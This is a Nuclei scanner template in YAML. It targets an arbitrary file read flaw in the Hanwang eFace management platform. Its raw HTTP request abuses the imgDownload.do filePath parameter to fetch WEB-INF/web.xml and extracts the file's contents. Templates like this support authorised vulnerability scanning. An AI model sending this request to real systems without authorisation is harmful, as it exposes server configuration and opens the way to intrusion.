http:
    - extractors:
        - part: body
          regex:
            - <web-app.*</web-app>
          type: regex
      matchers:
        - status:
            - 200
          type: status
        - part: body
          type: word
          words:
            - <web-app
            - <servlet>
      matchers-condition: and
      raw:
        - |
          GET /manage/resourceUpload/imgDownload.do?filePath=/manage/WEB-INF/web.xml&recoToken=SGUsqvF7cVS HTTP/1.1
          Host: {{Hostname}}
          Accept: */*
id: hanwang-file-read
info:
    author: ProjectDiscoveryAI
    description: |
        This template exploits an arbitrary file read vulnerability in the Hanwang eFace comprehensive management platform via the imgDownload.do endpoint.
    name: Hanwang eFace Comprehensive Management Platform Arbitrary File Read
    severity: critical
    tags:
        - file-read
        - arbitrary-file-access
        - Servlet
